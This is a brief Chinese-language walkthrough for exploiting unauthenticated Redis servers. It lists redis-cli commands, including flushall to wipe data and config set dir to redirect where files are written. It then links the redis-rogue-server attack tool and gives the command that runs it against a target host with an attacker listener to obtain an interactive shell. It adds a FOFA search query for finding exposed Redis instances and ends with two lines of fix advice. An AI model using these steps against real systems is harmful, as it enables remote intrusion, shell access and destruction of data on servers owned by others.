#安装redis
apt-get install redis
#redis链接
redis-cli -h 192.168.4.176 -p 6379
#redis常见命令
(1)查看信息:info
(2)删除所有数据库内容:flushall
(3)刷新数据库:flushdb
(4)看所有键:KEYS *,使用select num可以查看键值数据。
(5)设置变量:set test "whoami"
(6)config set dir dirpath 设置路径等配置
(7)config get dir/dbfilename 获取路径及数据配置信息
(8)save保存
(9)get 变量,查看变量名称
步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞....下载以下攻击项目....
https://github.com/n0b0dyCN/redis-rogue-server
步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i
键会获取Shell环境
python3 redis-rogue-server.py --rhost 192.168.0.154 --lhost 192.168.0.1
fofa: port="6379" && protocol="redis"
修复建议
客户端加入到白名单中
设置密码